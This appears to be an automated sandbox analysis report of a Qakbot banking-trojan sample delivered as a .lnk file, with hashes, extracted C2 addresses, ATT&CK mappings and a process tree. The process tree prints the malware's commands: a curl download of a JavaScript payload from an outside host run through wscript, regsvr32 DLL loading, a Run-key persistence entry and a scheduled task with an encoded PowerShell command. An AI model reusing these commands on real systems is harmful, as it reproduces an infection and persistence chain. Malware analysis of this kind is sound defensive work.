qakbot | 2a49944b548ca919f6c05bac4434b359a0bc81422901ac3c80160e383c1813e6

General

Target

Hiccorrupti188.lnk
Size

2KB
MD5

565d7da79e3da03b4f556f100955c10e
SHA1

2b4a629e7c6a74f7d72abe6522128b0db94a12d3
SHA256

2a49944b548ca919f6c05bac4434b359a0bc81422901ac3c80160e383c1813e6
SHA512

2a225d8a66ed416a7ed99aab6ad7a6cc0a44d4f3a1be1b2f5c38237598898b2f9099c67224a805953f95c9af620a6d991afd7fc5fd2f7286e6a7eb06a9928835

Score

10^/10

qakbot bb 1662650043 banker persistence stealer trojan

Malware Config

Extracted

Family

qakbot

Version

403.860

Botnet

BB

Campaign

1662650043

C2

191.97.234.238:995

81.131.161.131:2078

197.94.210.133:443

193.3.19.37:443

70.51.153.182:2222

99.232.140.205:2222

123.240.131.1:443

177.102.84.28:32101

105.156.152.227:443

190.59.247.136:995

89.211.218.88:2222

81.214.220.237:443

85.99.62.74:443

217.165.68.122:993

219.69.103.199:443

37.210.148.30:995

64.207.215.69:443

113.169.57.104:443

179.225.221.169:32101

151.234.94.35:990

Attributes

salt
SoNuce]ugdiB3c[doMuce2s81*uXmcvP

Signatures

Qakbot/Qbot
Qbot or Qakbot is a sophisticated worm with banking capabilities.
trojan banker stealer qakbot
Blocklisted process makes network request 2 IoCs

Processes:

wscript.exe

flow pid process

39 100 wscript.exe
40 100 wscript.exe
Downloads MZ/PE file

flow	pid	process
39	100	wscript.exe
40	100	wscript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exewscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation	wscript.exe

Loads dropped DLL 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

4732 regsvr32.exe
560 regsvr32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tpppwpjkv = "regsvr32.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Abbdcuz\\udcauhiovjyjxn.dll\""	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1696 schtasks.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

4860 PING.EXE
4888 PING.EXE

pid	process
1696	schtasks.exe

pid	process
4860	PING.EXE
4888	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exeexplorer.exeregsvr32.exeexplorer.exe

pid	process
4732	regsvr32.exe
4732	regsvr32.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
560	regsvr32.exe
560	regsvr32.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
3772	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe
4692	explorer.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

4732 regsvr32.exe
560 regsvr32.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

cmd.execmd.exewscript.execmd.exeregsvr32.exeregsvr32.exeexplorer.exeregsvr32.exe

description	pid	process	target process
PID 1220 wrote to memory of 3196	1220	cmd.exe	cmd.exe
PID 1220 wrote to memory of 3196	1220	cmd.exe	cmd.exe
PID 3196 wrote to memory of 4860	3196	cmd.exe	PING.EXE
PID 3196 wrote to memory of 4860	3196	cmd.exe	PING.EXE
PID 3196 wrote to memory of 4192	3196	cmd.exe	curl.exe
PID 3196 wrote to memory of 4192	3196	cmd.exe	curl.exe
PID 3196 wrote to memory of 100	3196	cmd.exe	wscript.exe
PID 3196 wrote to memory of 100	3196	cmd.exe	wscript.exe
PID 100 wrote to memory of 2712	100	wscript.exe	cmd.exe
PID 100 wrote to memory of 2712	100	wscript.exe	cmd.exe
PID 2712 wrote to memory of 4888	2712	cmd.exe	PING.EXE
PID 2712 wrote to memory of 4888	2712	cmd.exe	PING.EXE
PID 2712 wrote to memory of 3244	2712	cmd.exe	regsvr32.exe
PID 2712 wrote to memory of 3244	2712	cmd.exe	regsvr32.exe
PID 3244 wrote to memory of 4732	3244	regsvr32.exe	regsvr32.exe
PID 3244 wrote to memory of 4732	3244	regsvr32.exe	regsvr32.exe
PID 3244 wrote to memory of 4732	3244	regsvr32.exe	regsvr32.exe
PID 4732 wrote to memory of 3772	4732	regsvr32.exe	explorer.exe
PID 4732 wrote to memory of 3772	4732	regsvr32.exe	explorer.exe
PID 4732 wrote to memory of 3772	4732	regsvr32.exe	explorer.exe
PID 4732 wrote to memory of 3772	4732	regsvr32.exe	explorer.exe
PID 4732 wrote to memory of 3772	4732	regsvr32.exe	explorer.exe
PID 3772 wrote to memory of 1696	3772	explorer.exe	schtasks.exe
PID 3772 wrote to memory of 1696	3772	explorer.exe	schtasks.exe
PID 3772 wrote to memory of 1696	3772	explorer.exe	schtasks.exe
PID 3772 wrote to memory of 560	3772	explorer.exe	regsvr32.exe
PID 3772 wrote to memory of 560	3772	explorer.exe	regsvr32.exe
PID 3772 wrote to memory of 560	3772	explorer.exe	regsvr32.exe
PID 560 wrote to memory of 4692	560	regsvr32.exe	explorer.exe
PID 560 wrote to memory of 4692	560	regsvr32.exe	explorer.exe
PID 560 wrote to memory of 4692	560	regsvr32.exe	explorer.exe
PID 560 wrote to memory of 4692	560	regsvr32.exe	explorer.exe
PID 560 wrote to memory of 4692	560	regsvr32.exe	explorer.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Hiccorrupti188.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c echo 'a0' && ping 4j.org && MD "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && echo "PH" && curl.exe --output C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js https://matrixcommunication.net/s4Y/0.html && cd "C:\Users\Admin\AppData\Roaming\HM\K86O6h" && wscript tEZgi.tEY.QcZ.js
2⤵
- Suspicious use of WriteProcessMemory
PID:3196

C:\Windows\system32\PING.EXE
ping 4j.org
3⤵
- Runs ping.exe
PID:4860

C:\Windows\system32\curl.exe
curl.exe --output C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js https://matrixcommunication.net/s4Y/0.html
3⤵
PID:4192

C:\Windows\system32\wscript.exe
wscript tEZgi.tEY.QcZ.js
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:100

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping go.com && regsvr32 _WSP.dll
4⤵
- Suspicious use of WriteProcessMemory
PID:2712

C:\Windows\system32\PING.EXE
ping go.com
5⤵
- Runs ping.exe
PID:4888

C:\Windows\system32\regsvr32.exe
regsvr32 _WSP.dll
5⤵
- Suspicious use of WriteProcessMemory
PID:3244

C:\Windows\SysWOW64\regsvr32.exe
_WSP.dll
6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
7⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3772

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /Z /ST 18:43 /tn hdwsaacxjy /ET 18:54 /tr "powershell.exe -encodedCommand cgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwASABNAFwASwA4ADYATwA2AGgAXABfAFcAUwBQAC4AZABsAGwAIgA=" /SC ONCE
8⤵
- Creates scheduled task(s)
PID:1696

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dll"
8⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:560

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
9⤵
- Suspicious behavior: EnumeratesProcesses
PID:4692

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\HM\K86O6h\_WSP.dll
Filesize
483KB

MD5
2d07b8c39bba8161ceda00ac1037fe5d

SHA1
d8b4c7303779d36799b62b327747c204d89aa186

SHA256
a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389

SHA512
734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7

Download Submit
C:\Users\Admin\AppData\Roaming\HM\K86O6h\_WSP.dll
Filesize
483KB

MD5
2d07b8c39bba8161ceda00ac1037fe5d

SHA1
d8b4c7303779d36799b62b327747c204d89aa186

SHA256
a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389

SHA512
734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7

Download Submit
C:\Users\Admin\AppData\Roaming\HM\K86O6h\tEZgi.tEY.QcZ.js
Filesize
129KB

MD5
c9ee9686734db73e4ffbd30d50497d16

SHA1
7b15fa41b28ecd9adfb400b1b4a560cacf0e8965

SHA256
c759c5f4dc07ef25ab3a3606968e87274d9aa8772e8769bfccd0e9518fc0e1b9

SHA512
45ef770a0e650147066641ff9c1e76305dd67984d18f667fda246f5a326f2a048b7477f1b74bfadcda3569051fb97cc3a467e051420c9865e6c7fad4458e03d4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dll
Filesize
483KB

MD5
2d07b8c39bba8161ceda00ac1037fe5d

SHA1
d8b4c7303779d36799b62b327747c204d89aa186

SHA256
a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389

SHA512
734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Abbdcuz\udcauhiovjyjxn.dll
Filesize
483KB

MD5
2d07b8c39bba8161ceda00ac1037fe5d

SHA1
d8b4c7303779d36799b62b327747c204d89aa186

SHA256
a04971254387e1f8d57c65fee5b3f3b13f011a2eb5698bc1877ec816fa978389

SHA512
734cd479408b5f5c4f83896eb3e5b4e92d62aa82bd5b3e54d946a21b4ac783668e90de2eb62f22935b4469481a174482c16a41414810c3fcb9db5f8f93b112e7

Download Submit
memory/100-135-0x0000000000000000-mapping.dmp

Download
memory/560-151-0x0000000001210000-0x0000000001232000-memory.dmp

Filesize
136KB

Download
memory/560-153-0x0000000001210000-0x0000000001232000-memory.dmp

Filesize
136KB

Download
memory/560-147-0x0000000000000000-mapping.dmp

Download
memory/1696-146-0x0000000000000000-mapping.dmp

Download
memory/2712-137-0x0000000000000000-mapping.dmp

Download
memory/3196-132-0x0000000000000000-mapping.dmp

Download
memory/3244-139-0x0000000000000000-mapping.dmp

Download
memory/3772-150-0x00000000006B0000-0x00000000006D2000-memory.dmp

Filesize
136KB

Download
memory/3772-144-0x0000000000000000-mapping.dmp

Download
memory/3772-154-0x00000000006B0000-0x00000000006D2000-memory.dmp

Filesize
136KB

Download
memory/4192-134-0x0000000000000000-mapping.dmp

Download
memory/4692-152-0x0000000000000000-mapping.dmp

Download
memory/4692-155-0x00000000006D0000-0x00000000006F2000-memory.dmp

Filesize
136KB

Download
memory/4692-156-0x00000000006D0000-0x00000000006F2000-memory.dmp

Filesize
136KB

Download
memory/4732-145-0x0000000000650000-0x0000000000672000-memory.dmp

Filesize
136KB

Download
memory/4732-143-0x0000000000650000-0x0000000000672000-memory.dmp

Filesize
136KB

Download
memory/4732-141-0x0000000000000000-mapping.dmp

Download
memory/4860-133-0x0000000000000000-mapping.dmp

Download
memory/4888-138-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads